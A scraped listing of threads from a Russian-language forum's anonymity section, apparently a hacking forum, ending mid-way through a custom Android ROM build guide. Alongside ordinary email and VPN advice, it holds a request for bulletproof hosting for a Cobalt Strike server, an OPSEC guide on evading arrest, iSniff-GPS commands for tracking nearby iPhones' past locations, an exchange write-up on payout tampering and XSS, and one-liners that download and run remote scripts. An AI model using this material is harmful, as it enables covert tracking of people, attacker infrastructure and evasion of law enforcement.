Replies: 2 Views: 851

Доброе, касаемо сетевой структуры я не силен, но с последним переездом пришлось подключить этот ублюдский сервис.
Итак из проблем: постоянный айпи, который никак не меняется (я имею в виду, никакими перезагрузками и так далее)
Второе - ублюдские айпи которые они вяжут, мой - идентичен поисковому боту, капчу я решаю в день по несколько тысяч раз уже как робот.
Итак вопрос знатокам, как это говно фиксится? И есть ли мануал по настройке сети (роутера, адаптера) чтобы сделать максимально положительную видимость сети и максимально безопасную

упд.
щас в наличии есть меркусус м50джи
и тплинк арчер с50

Насколько безопасна электронная почта?

ID: 676533bbb4103b69df371cc2
Thread ID: 39296
Created: 2020-07-06T07:40:04+0000
Last Post: 2020-07-06T08:03:44+0000
Author: Igata_Ru
Replies: 1 Views: 848

Не очень! Но чтобы понять, давайте рассмотрим точки, в которых она может быть перехвачена.

Отправляя кому-то электронное письмо:

Во-первых , электронная почта должна переместиться с вашего компьютера на сервер почтового провайдера (например, Gmail). Может ли она быть перехвачена вашим интернет-провайдером или хакером в общедоступной сети Wi-Fi, зависит от того, поддерживает ли ваш почтовый провайдер шифрование. Если вы используете электронную почту в самом браузере, проверьте наличие зеленого замка в строке URL. Если он есть, то письмо зашифровано. Если вы используете IMAP/POP3, посмотрите в настройках вашего почтового клиента (например, Thunderbird), настроено ли использование SSL/TLS, STARTTLS или стоит None. Если последнее, то письмо не зашифровано.

Во-вторых , как только электронная почта поступает к почтовому провайдеру, она сохраняется на их серверах. Если вы не используете Protonmail или Tutanota, которые специально разработаны для защиты ваших писем от чтения (на их серверах письма хранятся в зашифрованном виде), то провайдер электронной почты может прочитать все вашы письма. Как правило, мы доверяем нашим провайдерам электронной почты, но все то требуется не добросовестный сотрудник, хакер или постановление суда, чтобы ваши электронные письма были раскрыты потенциально нежелательным сторонам.

Дальше письмо отправляется е-mail провайдером, провайдеру получателя, после чего первая и вторая области риска (шифруется ли почта при передаче и является ли почтовый провайдер надежным и безопасным) повторяются. Когда речь заходит о безопасности электронной почты, независимо от того, насколько безопасны ваши собственные методы работы с электронной почтой, человек, с которым вы общаетесь, может нарушить вашу конфиденциальность с помощью более слабых мер безопасности.

Улучшение безопасности e-mail
Не вдаваясь в подробности, есть несколько способов повысить безопасность вашей электронной почты.

Прежде всего, включите двухфакторную аутентификацию, которая добавит слой защиты и усложнит жизнь тем кто хочет прочесть вашу переписку.

Во-вторых, попробуйте шифрование PGP. Хоть оно немного сложновато в использовании, PGP полностью зашифрует все ваши электронные письма, а это означает, что вам вообще не нужно доверять своему поставщику электронной почты. Обратите внимание, что те, кому вы пишете, также должны будут использовать PGP, что делает такой вариант более безопасным. Ведь теперь вы точно знаете что обе стороны надежно защищенны.

Наконец, если вы хотите пойти в хардкор и не только получить сквозное шифрование, но и значительно запутать все метаданные (с кем вы разговариваете, откуда и когда), то смотрите в сторону I2P и I2P-Bote. Как и в случае с PGP, требуется, чтобы человек, с которым вы общаетесь, также использовал I2P-Bote.
Слито с форума ***************

Основные правила анонимности или как не сесть на бутылку забыв о банальщине.

ID: 676533bbb4103b69df371a4d
Thread ID: 90890
Created: 2023-06-19T14:15:05+0000
Last Post: 2023-06-20T11:55:55+0000
Author: Rill
Prefix: Статья
Replies: 5 Views: 847

Большинство людей стремятся обеспечить свою анононимность путем технических решений, но забывают банальные основы из-за чего потом и происходит их деанонимизация. Статья в основном для новичков, однако думаю что некоторым старичкам стоит вспомнить о такой банальщине.

Правило номер 1
Нераскрытие информации.
Вроде бы правило очевидное, но довольно часто встречаю людей которые его не соблюдают.
В чем суть правила?
Даже если информация кажется тебе незначимой и ты считаешь, что по ней будет сложно установить кто ты, не раскрывай ее. Информация всего-то о твоем поле позволяет сократить число вариантов примерно в два раза. Про страну и город я вообще молчу. Комбинируя известную информацию, легко можно определить конкретного человека.
Пример:
Мужчина. Примерный возраст 25 лет. Карие глаза, брюнет. Написал в одном из чатов что он пошел в пекарню купить хлеб. Дальше написал о том какая там жуткая очередь и что он только вышел. До этого он не раз описывал некоторые свои походы, ведь чат по его мнению никак не связан с его деятельностью и вообще там его старые знакомые. Банально открыв онлайн карты можно сопоставив время сообщений (примерное время за которое он дошел до места) и места в которые он ходил найти его район. Дальше опять таки сопоставив время найти пару домов в которых он может жить. Используя вэб камеры в этом районе найти человека подходящего по внешности и отследить направление его движения к дому. Таким образом мы можем спокойно найти дом где живет человек. Конечно, есть много условностей и нюансов, однако действия в таком случае почти не отличаются.

Правило номер 2
Ложная информация
Что если человек спрашивает о том кто ты, однако отмалчиваться не вариант?
Лги! Говори что ты из Воркуты живя где-то в Челябинске. Лги о своей внешности. Лги о своих хобби. Лги о музыкальных предпочтениях и прочем.
Думаю понятно, но что делать чтобы легенда была реальной и ты не попались на своей лжи?
Открываешь онлайн карты и начинаешь виртуальную экскурсию по городу который ты выбрал. Читаешь пару коротких статей о городе. Подписываешься на канал с новостями из этого города. Ищешь пару городских легенд. В чате новостного канала вылавливаешь человека и пишешь ему в лс с просьбой рассказать о лучших барах/кафе/ресторанах города. Пишешь естественно не с того аккаунта который собираешься использовать для своей левой личности. Ну и самое главное - не добавляй много деталей которые ты потом забудешь.

Правило номер 3
Лингвистика
Каждый человек имеет свой собственный идеолект, т.е совокупность речевых особенностей. Например скобочки в конце сообщений, точки, использование редких и устаревших слов, расставление знаков препинания, написание некоторых слов. Меняй все это. Если ставишь скобочки, то начинай ставить точки, ну или откажись от знаков в конце. Если у тебя есть любимые смайлики, то не применяй их.
Для того чтобы ваш текст отличался от вашего привычного советую по началу использовать блокнот. Пишешь туда текст в своем обычном стиле, потом убираешь знаки в конце если ты их используешь, убираешь слова которые ты обычно используешь, убираешь смайлики. Меняешь построенние текста, гуглишь синонимы к различным словам и заменяешь, убираешь речевые обороты и заменяешь их другими. По началу только так, ну а дальше у тебя уже будет навык который позволит тебе писать текст в стиле отличающимся от твоего сразу.
Самый яркий пример жертвы третьего правила это Теодор Качинский более известный как Unabomber (RIP 22 мая 1942 г - 10 июня 2023 г).
Собственно новость о его смерти и вдохновила меня напомнить вам, а может для кого и открыть эти 3 основных правила.

Спасибо за прочтение.

Bulletproof VPS for CobaltStrike hosting

ID: 676533bbb4103b69df371c72
Thread ID: 45164
Created: 2020-12-04T08:13:03+0000
Last Post: 2020-12-04T12:15:26+0000
Author: gh0st_
Replies: 1 Views: 846

Zdravstvuyte brat'ya,

Could someone recommend me a Russian/Separatist Ukraine(Donetsk) bulletproof hosting service? I want to host Cobalt server without being bothered by DMCA and by abuse complaints.

Spasiba!

Чистка подключений wifi

ID: 676533bbb4103b69df371c05
Thread ID: 51240
Created: 2021-04-29T14:23:13+0000
Last Post: 2021-05-03T17:42:32+0000
Author: tron123443
Replies: 4 Views: 846

Подключившись к вайфаю на ноутбуке остается информация о подключении. Как полностью удалить эту информацию с журналов и где она еще может хранится (в нашем случае на нашем компьютере).

Как поднять свой Double VPN, Triple VPN

ID: 676533bbb4103b69df371948
Thread ID: 119006
Created: 2024-07-16T22:01:51+0000
Last Post: 2024-07-16T23:07:29+0000
Author: pablo
Prefix: Статья
Replies: 3 Views: 845

Привет, друг! В этой статье, я научу тебя легко поднимать свой личный Double VPN , Triple VPN , Quad VPN. Будет две схемы реализации: на основе WireGuard и OpenVPN. Я лично пользуюсь WireGuard. Я знаю, что тебе она может не понравится только по одной причине: потому-что нет WireGuard с GUI и нет пока для платформы iOS. Понимаю. Но проект еще молодой, и в скором будущем обязательно ждем кроссплатформенность.

Click to expand...

Советую смотреть видео , и поглядывать статью. Статья идет как вспомогательный источник информации:

Настройку цепочки серверов по данной инструкции можно выполнять на любом VPS с операционной системой Ubuntu. Для настройки многоузлового VPN туннеля необходимо подключиться по SSH на первый VPS из цепочки серверов и выполнить скрипт, который я написал ниже, в разделе "Установка ".

В роли VPN серверов выступают VPS c **операционной системой Ubuntu (

=16.04). **

Click to expand...

Установка

Сначала скачай необходимые программы для своей платформы:

для Windows

Putty - https://bit.ly/2nqKukc

OpenVPN - https://bit.ly/2JXtbjT

TunSafe - http://bit.ly/2QCmq9A**
для MacOS

Viscosity - https://bit.ly/2JXwG

Tunnelblick -http://bit.ly/2qGqxGf
Для Android**

OpenVPN - http://bit.ly/2T4ExXn

WireGuard - http://bit.ly/2DAuHbq**
для iOS**

OpenVPN - https://apple.co/2T8rGDu

Click to expand...

Подключайся к своему VPS серверу через Putty, скопируй и вставь в консоль следующую строку.

Code:Copy to clipboard

wget https://raw.githubusercontent.com/iamrooot/doublevpn/master/1.sh && chmod +x 1.sh && ./1.sh

Жми ENTER, и скрипт начнет свою работу.

Отвечая на вопросы мастера, поэтапно, в консоли вводи данные ко всем серверам начиная с первого и заканчивая последним (IP и PASSWORD)

Вводи количество серверов участвующих в цепочке VPN (от 1-го до 9-и) и нажать ENTER

Вводи IP адрес первого сервера

Затем пароль SSH от каждого сервера
Процесс добавления VPS серверов в цепочку, выглядит примерно так:

И так далее....

И так для каждого сервера в цепочке вписываем аналогичные данные. Максимальное количество серверов, которое ты можешь использовать до **9.
Сервер который указан последним, будет шлюзом в интернет (его IP будет зафиксирован как твой).

Важный момент!**
После того, как скрипт полностью завершит свою работу, отобразиться вот такая картинка:

Для тебя будет предоставлен выбор, через какую программу ты хочешь использовать VPN(какую конфигурацию ты хочешь использовать). WireGuard или OpenVPN. Далее объясню подробнее.

Настройка

Настройка WireGuard, клиента TunSafe для Double, Triple, Quad VPN

http://bit.ly/2QCmq9A

Копируем содержимое выведенное на экран после этапа установки

Запускаем программу TunSafe нажимаем на "Edit Config ", в открывшемся блокноте вставляем скопированный текст конфигурации из консоли, сохраняем и закрываем блокнот.

Если конфигурация была изменена, необходимо нажать кнопку Reconnect.

**
Настройка для Ubuntu.**

в окне терминала поэтапно выполняем:

Code:Copy to clipboard

$ sudo add-apt-repository ppa:wireguard/wireguard $ sudo apt-get update $ sudo apt-get install wireguard

В файловом менеджере создаём файл wg.conf по пути /etc/wireguard/

![](/proxy.php?image=https%3A%2F%2Flh3.googleusercontent.com%2F4Sp- mT2cWlWHlIst7K9Mt3caOiWQKijygprAdAygd8pu4embb6TC56cCdOGWHwxfdrYe8pSFc7hknVQ1GYJNUdQf-38RNhMxYEzvZlGAns6miRolBG7heVUokU_SyX- IPvpwoBcB&hash=d383bb68ec593574c684e2f269168a3f)
и наполняем его содержимым скопированным из консоли.

Включение производиться командой выполненной в терминале: **wg-quick up wg

Настройка для Android**
Скачиваем приложение - http://bit.ly/2DAuHbq

В приложении выбираем: “+” затем “Create from QR code” - сканируем код

Открываем в браузере любой Генератор QR-кода , например https://generator-online.com/qrcode/ и вставляем содержимое конфигурационного файла WireGuard.

Вставляем в окно текст конфигурации WireGuard, после сканируем бар код справа.

Копируем этот текст конфигурации WireGuard и вставляем содержимое на сайте Генератора QR-кода.

Задаем имя нового подключения - подтверждаем нажав “Create Tunnell”

Активируем подключения включив чекбокс

Настройка OpenVPN для Double, Triple, Quad VPN

http://bit.ly/2B1inyp

Обращаем внимание, после завершения работы скрипта, я говорил в начале, мы видим 2 параметры для настройки. Это для WireGuard и OpenVPN. WireGuard выше мы настроили, теперь я покажу тебе как настраивать **Double, Triple, Quad VPN 'ы **с помощью OpenVPN.

Нас интересует нижняя часть для настройки OpenVPN

Заходим по ссылке https://199.247.28.115

Скриншот из первой статьи по настройке VPN

Изменения:

в поле VIrtual Network указать 10.0.0.0/24

Ставим галочку для Allow Multiple Devices(если хочешь использовать VPN на нескольких устройствах одновременно)

в поле Name - имя твоего VPN соединения

После внесения настроек жмем Save

Подключение к OpenVPN для всех устройств, я так же показал тебе в прошлой моей статье, ближе к концу статьи. Посмотри http://bit.ly/2DAyMwb так же это я показал на видео-ролике

Click to expand...

Тестирование. Общая информация.

WireGuard

Используя данное решение можно собирать VPN туннель из количества серверов от 1-го до 9-и. Следует учитывать , что при выключение одного из цепочки VPS , интернет подключениебудет прервано , при этом индикация клиента VPN может не измениться (она отражает только состояние подключения к первому серверу).

Click to expand...

При необходимости изменить порядок серверов или переназначить конечный сервер, который от своего имени отправляет трафик в Интернет, достаточно просто перезапустить скрипт из пункта выше "Установка ".

Работа скрипта наплавлена на полную анонимизацию, поэтому следует учесть, что после завершения работы все ключи шифрования, конфигурационный файлы а также скрипты развертывания будут удалены.

Можно выделить следующие плюсы использования Double VPN, Triple VPN, Quad VPN технологии:

твой Интернет-провайдер будет видеть подключение к первому VPN серверу, но не будет знать твой конечный IP адрес в Интернете, так как выход в Интернет осуществляется со второго VPN сервера

второй VPN сервер не будет знать твой реальный IP адрес, так как он будет скрыт первым VPN сервером. Это повышает твою анонимность

можно использовать разные географические местоположения VPN серверов, находящихся на разных континентах (например, Панама, Малайзия, Корея).

на каждом этапе меняется IP адрес, что создает многослойность твоей анонимности

WIreGuard спроектирован как многоцелевой VPN , который может работать на множестве платформ и подходит для всех типов использования. Изначально WireGuard был создан для ядра Linux, но планируется его кроссплатформенность и возможность развёртывания во множестве сред. Как я говорил в начале.

Насколько хорош WireGuard?
Хотя сейчас он находится в стадии активной разработки, он уже назван многими самым безопасным, легким в использовании и простым VPN -решением в индустрии.

Сравнительная таблица VPN протоколов

Автор Белый Кролик @WhiteRabiit
[источник](https://telegra.ph/Kak-podnyat-svoj-Double-VPN-Triple-VPN-Quad-VPN- i-tak-dalee-11-09)

Телеметрия windows & office

ID: 676533bbb4103b69df371929
Thread ID: 88970
Created: 2023-05-26T15:35:14+0000
Last Post: 2024-09-24T19:35:18+0000
Author: weaver
Prefix: Мануал/Книга
Replies: 2 Views: 843

windows

[ E20172000_BSI_Win10_TELABGL_v1_2.pdf - AnonFiles

](https://anonfiles.com/5fA8D9t3z5/E20172000_BSI_Win10_TELABGL_v1_2_pdf)

anonfiles.com

office

[ Office_Telemetrie.pdf - AnonFiles

](https://anonfiles.com/9595D8t8z0/Office_Telemetrie_pdf)

anonfiles.com

Создаём фейковую личность для проведения расследований и иных целей

ID: 676533bbb4103b69df371ab6
Thread ID: 73575
Created: 2022-09-24T11:47:08+0000
Last Post: 2022-09-24T16:18:42+0000
Author: DigitalScout
Prefix: Мануал/Книга
Replies: 2 Views: 839

[ Создаём фейковую личность ](https://telegra.ph/Sozdayom-fejkovuyu-

lichnost-09-24)

Часто в расследованиях нужно выходить на контакт с объектом поиска, регистрироваться на сайтах. Конечо, не стоит использовать свои личные данные. В этом руководстве я подробно опишу процесс создания нового человека, начиная гугл-аккаунтом и заканчивая фотографиями...

telegra.ph

У кого-нибудь есть список премиум-аккаунтов Cyberghost VPN?

ID: 676533bbb4103b69df371cc4
Thread ID: 39162
Created: 2020-07-02T11:51:59+0000
Last Post: 2020-07-02T11:51:59+0000
Author: edward0666
Replies: 0 Views: 838

Does anyone have a list of Cyberghost VPN premium accounts?

Анонимность, безопасность iOS

ID: 676533bbb4103b69df371991
Thread ID: 84838
Created: 2023-03-30T06:36:43+0000
Last Post: 2024-03-19T13:03:29+0000
Author: SenjorZeroday
Replies: 21 Views: 835

Вычисляем передвижение IOS-устройств

Для того, чтобы посмотреть передвижения IOS-устройства, достаточно установить инструмент ISniff-GPS. Данная утилита отслеживает пакеты ARP, которые "испускают" Айфоны и другая продукция Apple.
iSniff GPS пассивно обнюхивает зонды SSID, пакеты ARP и MDNS (Bonjour), передаваемые ближайшими iPhone, iPad и другими беспроводными устройствами. Цель состоит в том, чтобы собрать данные, которые можно использовать для идентификации каждого устройства и определения предыдущих географических местоположений, основываясь исключительно на информации, которую каждое устройство раскрывает о ранее подключенных сетях Wi-Fi.

Устройства iOS передают ARP, которые иногда содержат MAC-адреса (BSSID) ранее присоединенных сетей Wi-Fi, как описано в [1]. iSniff GPS захватывает эти ARP и отправляет MAC-адреса в службу определения местоположения Wi-Fi Apple (маскируясь под устройство iOS) для получения GPS-координат для данного BSSID. Если для определенного устройства были захвачены только зонды SSID, iSniff GPS может запросить имена сетей на wigle.net и визуализировать возможные местоположения.

Путем геолокации нескольких SSID и MAC-адресов маршрутизатора Wi-Fi можно определить, где, вероятно, находилось устройство (и, следовательно, его владелец).

Установка:

Code:Copy to clipboard

$ sudo apt-get install python-scapy $ git clone https://github.com/hubert3/iSniff-GPS.git $ cd iSniff-GPS/ $ pip install -U -r requirements.txt

Использование:

Code:Copy to clipboard

$ ./manage.py runserver 127.0.0.1:8000 & $ ./run.sh -i wlan0

После ввода последней команды, вам будет доступно местоположение IOS- устройства, которое вы хотите отследить.

Биржи [ Часть 2 ]

ID: 676533bbb4103b69df3719c5
Thread ID: 103017
Created: 2023-11-26T13:35:42+0000
Last Post: 2024-01-15T12:44:17+0000
Author: grozdniyandy
Prefix: Статья
Replies: 6 Views: 833

Еще одна мини-статья о Бирже.

Я не хочу, чтобы она была последней, но, возможно, так оно и будет. Я продолжу тестирование, возможно, когда мне больше нечем будет заняться. Сервисы Best Change вкладывают только на обслуживание клиентов; разработка и безопасность даже не рассматриваются. Нет, я не говорю вам не стоит их использовать; я использую их сам. Но мы все должны принимать возможные риски.

Отправка суммы

Итак, я подумал, что было бы забавно, если бы я мог изменить адрес, на который должны прийти деньги. Например, я введу свой собственный BTC-адрес и свой собственный USDT-адрес. Я буду платить своим BTC себе же, а биржа чекнув транзакцию ещё бабки на мой USDT оплатит. Это, вероятно, сработало бы, если бы система была полностью автоматизирована, но, как я понимаю, службы делают все это вручную.

Изображение [1]

Как вы можете видеть в запросе выше, у нас есть "income_account", который на самом деле должен быть пустым. Позже адрес BTC будет добавлен автоматически. Вместо этого я решил добавить свой собственный BTC-адрес, поэтому я буду отправлять деньги сам себе, а затем "outcome_account" - это мой USDT-адрес, на который должны быть отправлены средства после того, как я произведу платеж на "income_account". Итак, по сути, я отправляю BTC самому себе, а Биржа автоматически отправит мне USDT.

Изображение [2]

Как отреагировала биржа? Они сказали, откройте другой запрос и не указывайте свой адрес, это смешно.

Контакт

Я увидел контактную форму, в которой была функция загрузки файла. И то, что я загрузил, было сохранено на сервере, а затем отражено внутри тега "img" в атрибуте "src". Поэтому я подумал, что могу обойти это и выйти из атрибута "src", чтобы выполнить XSS, например. Это было отражено следующим образом <img src='http://local.local./filename.jpg'> и я решил заменить имя файла полезной нагрузкой.

Изображение [3]

Изображение [4]

Изображение [5]

Изображение [6]

С этими обменниками всегда происходят странные вещи. Мой вам совет - не регистрируйтесь ни на одной из бирж (особенно те которые в бестчейндж) и уж тем более не храните там свои деньги. Оставайтесь в безопасности!

Автор grozdniyandy

Источник https://xss.is/

Телеграм аккаунт

ID: 676533bbb4103b69df371c95
Thread ID: 41887
Created: 2020-09-08T19:18:06+0000
Last Post: 2020-09-30T08:37:04+0000
Author: negg
Replies: 5 Views: 827

Есть у меня телеграм аккаунт,с виртуальным номером. Без юзернейма.Без аватарки. Каким образом мой акк взломают?(деанон имею ввиду). Можете сами напридумывать вопрос с какой то другой стороны,если он кажется неправильным или не логичным. Интересно

Windows Defender ATP для Android

ID: 676533bbb4103b69df371cc8
Thread ID: 38834
Created: 2020-06-25T08:07:03+0000
Last Post: 2020-06-25T08:07:03+0000
Author: Apocalypse
Replies: 0 Views: 822

У кого есть возможность скачать сабж?

![docs.microsoft.com](/proxy.php?image=https%3A%2F%2Flearn.microsoft.com%2Fen- us%2Fmedia%2Fopen-graph- image.png&hash=9d6f0d18756f3d99ae462d15c3a265f8&return_error=1)

[ Deploy Microsoft Defender for Endpoint on Android with Microsoft Intune

Microsoft Defender for Endpoint ](https://docs.microsoft.com/en- us/windows/security/threat-protection/microsoft-defender-atp/android-intune)

Describes how to deploy Microsoft Defender for Endpoint on Android with Microsoft Intune

docs.microsoft.com

Нужен .apk файл

Прокси и виртуальная машина

ID: 676533bbb4103b69df371c02
Thread ID: 50914
Created: 2021-04-21T18:22:14+0000
Last Post: 2021-05-05T19:45:30+0000
Author: pinkdeath
Replies: 3 Views: 822

Я конечно извиняюсь,что задаю столько вопросов,но не могли бы опять помочь
Есть виртуалка WMWare и прокси(SOCKS5) на основной OC.
Надо сделать так,чтобы виртуалка соединялась с интернетом через прокси.А уже на самой виртуалке можно было без проблем подрубать VPN.
Как это грамотно оформить?

как убедиться в оригинальности версии андройд

ID: 676533bbb4103b69df371cc9
Thread ID: 38822
Created: 2020-06-24T21:48:23+0000
Last Post: 2020-06-24T21:48:23+0000
Author: Makaroha99
Replies: 0 Views: 817

Что должно говорить о том, что в меня нет никаких проблем с телкфоном, его версией и что все приложения оригинальные?
Ситуация такая. Я подозреваю, что мне на телефон установили бота, который заменил все приложения и операционную систему в том числе.
Я плохо во всем этом шарю, но текйон работает иначе...Иначе выглядит все. Как буд то копия, но отличается в мелочах.

Подмена фингерпринта

ID: 676533bbb4103b69df3719d1
Thread ID: 97615
Created: 2023-09-08T16:16:20+0000
Last Post: 2023-12-17T21:24:48+0000
Author: USA2FA
Replies: 4 Views: 816

Привет друзья. Интересует вопрос как можно на Virtual Box подменить все данные.
А конкретно интересует процессор и видеокарта.

Stream Isolation в ТОР вообще, и в Whonix в частности.

ID: 676533bbb4103b69df371930
Thread ID: 62314
Created: 2022-02-01T20:00:25+0000
Last Post: 2024-09-11T18:22:23+0000
Author: bbi34yy
Replies: 7 Views: 815

Вот картинка для особо параноидальных.

Я давно уже изучаю этот вопрос, но на днях решил окончательно перевести мануально настройки разных приложений на разные сокс порты в whonix.
Касается это не только Whonix, но и всех приложений(если вы его не используете), которые вы пропускаете через ТОР.
Если я был единственным(или одним из немногих), кому это вообще интересно - я чуть попозже растолкую.
Если кто-то уже "посвящен", то обьясните вы своими словами.
В общем - поделитесь кто-то использует или нет.

Ссылка где все обьяснено:
хttp://www.dds6qkxpwdeubwucdiaord2xgbbeyds25rbsgr73tbfpqpt4a6vjwsyd.onion/wiki/Stream_Isolation

Saudi Proxy?

ID: 676533bbb4103b69df371bdd
Thread ID: 53171
Created: 2021-06-21T18:40:36+0000
Last Post: 2021-06-21T18:40:36+0000
Author: FatalException
Replies: 0 Views: 815

Anyone have proxy that works for accessing IP in Kingdom Saudi Arabia - site is blocking my requests from various VPN and anon proxy.

Бесплатные VPN

ID: 676533bbb4103b69df371bfc
Thread ID: 51584
Created: 2021-05-09T19:33:50+0000
Last Post: 2021-05-13T05:36:10+0000
Author: nsidcz
Replies: 9 Views: 812

Каким бесплатным впном лучше пользоваться? Денег поднимать свой или покупать подписку нет.

Условно Безопасные Смартфоны

ID: 676533bbb4103b69df371997
Thread ID: 110000
Created: 2024-03-08T20:08:43+0000
Last Post: 2024-03-10T14:59:30+0000
Author: Tr3kzzz
Prefix: Статья
Replies: 12 Views: 809

Введение

Какие устройства можно рассматривать как условно безопасные?

- Те устройства где можно после установки кастомной прошивки заблокировать bootloader.
- Где защищен стек, куча, память
- Где есть firewall с правилами для каждого процесса или приложения и
есть возможность запретить обращение к конкретному домену конкретному процессу
И так далее...

Spoiler: Как выглядит нормальный firewall

Spoiler: Список устройств

Google pixel 3-8
OnePlus 6, 6t
Razer phone 2

В хорошей прошивке у нас должен быть firewall, не такой о котором говорят представители GrapheneOS и другие, они нам говорят что нормальный firewall невозможно реализовать, где есть логирование (пример логирование соединений приложений в IOS)

Что мы можем со всем этим сделать?
Конечно же собрать свою прошивку на основе их и добавить все нужные функции!
Берем за основу DivestOS и iodeOS

Теперь нужно подготовить железо и окружение к сборке:

Spoiler: Характеристики сервера сборок

Code:Copy to clipboard

For builds under 3 hours you'll want to have at least a powerful quad core processor, 32GB of RAM, and a 7200RPM drive. For builds under an hour you'll want to have a processor that gets a score of 30k+ or higher on Passmark, 64GB of RAM, and a large SSD. Note: CFI enabled kernels will fail to compile with less than 64GB of RAM. It may be possible to get by with 16GB + zram, regardless zram is recommended in all cases. If you plan on building in a virtual machine, in terms of performance: KVM > Hyper-V > VMWare > VirtualBox You'll need a lot of available free space on your drives - Source Code: 200GB + ~5GB per device - ~100GB per device for building - ~10GB per device for optional ccache - ~4GB for each resulting build - ~10GB for two target-files for a device to optionally generate incremental updates - Cheap: ~$60 2TB 7200RPM HDD (non-SMR) - Fast: ~$150 2TB SSD (MLC/"enterprise" preferred) - If you plan on having multiple versions available btrfs+zstd:1+duperemove is strongly recommended.

Настройка окружения

Spoiler: Fedora

Bash:Copy to clipboard

sudo dnf install @development-tools android-tools automake bc bison bzip2 bzip2-libs ccache curl dpkg-dev flex gcc gcc-c++ git git-lfs glibc-devel.{x86_64,i686} gnupg gperf ImageMagick ImageMagick-c++-devel ImageMagick-devel java-1.8.0-openjdk java-1.8.0-openjdk-devel libgcc.{x86_64,i686} libstdc++.{x86_64,i686} libX11-devel.{x86_64,i686} libxml2-devel libXrandr.{x86_64,i686} libXrender.{x86_64,i686} libxslt lz4-libs lzop make maven mesa-libGL-devel.{x86_64,i686} ncurses ncurses-compat-libs ncurses-devel.{x86_64,i686} ninja-build openssl-devel optipng jpegoptim perl perl-Digest-MD5-File perl-Switch pngcrush python python2 python3-virtualenv python3 python3-mako python-mako python-markdown python-networkx readline-devel.{x86_64,i686} rsync schedtool SDL squashfs-tools syslinux-devel unzip wxGTK xml2 xz-lzma-compat zip zlib zlib-devel.{x86_64,i686} vim-common vboot-utils mozilla-fira-mono-fonts mozilla-fira-sans-fonts openssl nano htop wget; sudo curl https://storage.googleapis.com/git-repo-downloads/repo >> /usr/bin/repo; sudo chmod a+x /usr/bin/repo; umask 0022; git config --global user.name "Tr3Kzzz"; git config --global user.email "Tr3Kzzz@protonmail.com"; #Clone git clone https://codeberg.org/divested-mobile/divestos-build.git DivestOS; cd DivestOS; #Submodules sed -i 's|git@gitlab.com:|https://gitlab.com/|' .git/config .gitmodules; git submodule update --init --recursive; #Basic directories mkdir -p Build/LineageOS-20.0/.repo/local_manifests Builds Signing_Keys .Signing_Keys; #Encrypted key storage gocryptfs -init .Signing_Keys; #Create the vault gocryptfs .Signing_Keys/ Signing_Keys/; #Mount the vault #Update settings nano Scripts/Generate_Signing_Keys.sh; #Update description cd Build/LineageOS-20.0; #Add the initial manifest cat ../../Manifests/Manifest_LAOS-20.0.xml > .repo/local_manifests/local_manifest.xml; nano .repo/local_manifests/local_manifest.xml;

Теперь нужно подробно рассмотреть пункт:

nano .repo/local_manifests/local_manifest.xml

Манифест содержит список ресурсов которые будут синхронизироваться из реп (деревья девайсов, разный софт и зависимости)
Чтобы не тащить лишние ресурсы давайте приведем его вот к такому виду:

Spoiler: local_manifest.xml

XML:Copy to clipboard

<?xml version="1.0" encoding="UTF-8"?> <manifest> <remote name="gitlab" fetch="https://gitlab.com/" /> <remote name="angry" fetch="https://gitea.angry.im/" /> <remote name="iode" fetch="https://gitlab.com/iode/os/public" revision="v4.10" />  <remove-project name="LineageOS/android_external_ant-wireless_ant_native" /> <remove-project name="LineageOS/android_external_ant-wireless_ant_service" /> <remove-project name="LineageOS/android_external_bash" /> <remove-project name="LineageOS/android_external_htop" /> <remove-project name="LineageOS/android_external_libncurses" /> <remove-project name="LineageOS/android_external_nano" /> <remove-project name="LineageOS/android_external_openssh" /> <remove-project name="LineageOS/android_external_rsync" /> <remove-project name="LineageOS/android_external_unrar" /> <remove-project name="LineageOS/android_external_vim" /> <remove-project name="LineageOS/android_packages_apps_Eleven" /> <remove-project name="LineageOS/android_packages_apps_Jelly" />  <remove-project name="LineageOS/charter" /> <remove-project name="LineageOS/cm_crowdin" /> <remove-project name="LineageOS/contributors-cloud-generator" /> <remove-project name="LineageOS/hudson" /> <remove-project name="LineageOS/lineage_wiki" /> <remove-project name="LineageOS/mirror" /> <remove-project name="LineageOS/www" /> <remove-project name="platform/packages/apps/Browser2" /> <remove-project name="platform/packages/apps/Music" /> <remove-project name="platform/packages/apps/MusicFX" /> <remove-project name="platform/packages/apps/QuickSearchBox" /> <remove-project name="platform/packages/apps/SampleLocationAttribution" />  <remove-project name="platform/prebuilts/clang/host/darwin-x86" /> <remove-project name="platform/prebuilts/go/darwin-x86" />     <remove-project name="LineageOS/android_external_chromium-webview_patches" /> <remove-project name="LineageOS/android_external_chromium-webview_prebuilt_arm" /> <remove-project name="LineageOS/android_external_chromium-webview_prebuilt_arm64" /> <remove-project name="LineageOS/android_external_chromium-webview_prebuilt_x86" /> <remove-project name="LineageOS/android_external_chromium-webview_prebuilt_x86_64" /> <project path="external/chromium-webview" name="divested-mobile/mulch" groups="pdk" clone-depth="1" remote="gitlab" revision="master" />    <project path="external/hardened_malloc" name="GrapheneOS/hardened_malloc" remote="github" revision="8d5c63122499169df5fd9ed6e91fb116512a4745" />  <project path="packages/apps/OpenEUICC" name="PeterCxy/OpenEUICC" remote="angry" revision="6add8c89ac141f177cd8d124a0a955232f4222f9" /> <project path="prebuilts/openeuicc-deps" name="PeterCxy/android_prebuilts_openeuicc-deps" remote="angry" revision="55f3e2c7ab26484f7478b26540fa14392d0c2cd7" />    <project path="system/qcom" name="LineageOS/android_system_qcom" remote="github" revision="lineage-20" /> <project path="external/bson" name="LineageOS/android_external_bson" remote="github" revision="lineage-20" /> <project path="hardware/sony/macaddrsetup" name="LineageOS/android_hardware_sony_macaddrsetup" remote="github" revision="lineage-20" /> <project path="hardware/sony/simdetect" name="LineageOS/android_hardware_sony_simdetect" remote="github" revision="lineage-20" /> <project path="hardware/sony/SonyOpenTelephony" name="LineageOS/android_hardware_sony_SonyOpenTelephony" remote="github" revision="lineage-20" /> <project path="hardware/sony/timekeep" remote="github" name="LineageOS/android_hardware_sony_timekeep" revision="lineage-20" /> <project path="packages/apps/ElmyraService" name="LineageOS/android_packages_apps_ElmyraService" remote="github" />  <project path="device/google/crosshatch" name="LineageOS/android_device_google_crosshatch" remote="github" revision="lineage-20" /> <project path="device/google/blueline" name="LineageOS/android_device_google_blueline" remote="github" revision="lineage-20" /> <project path="kernel/google/msm-4.9" name="LineageOS/android_kernel_google_msm-4.9" remote="github" revision="lineage-20" />  <project path="device/google/bonito" name="LineageOS/android_device_google_bonito" remote="github" revision="lineage-20" /> <project 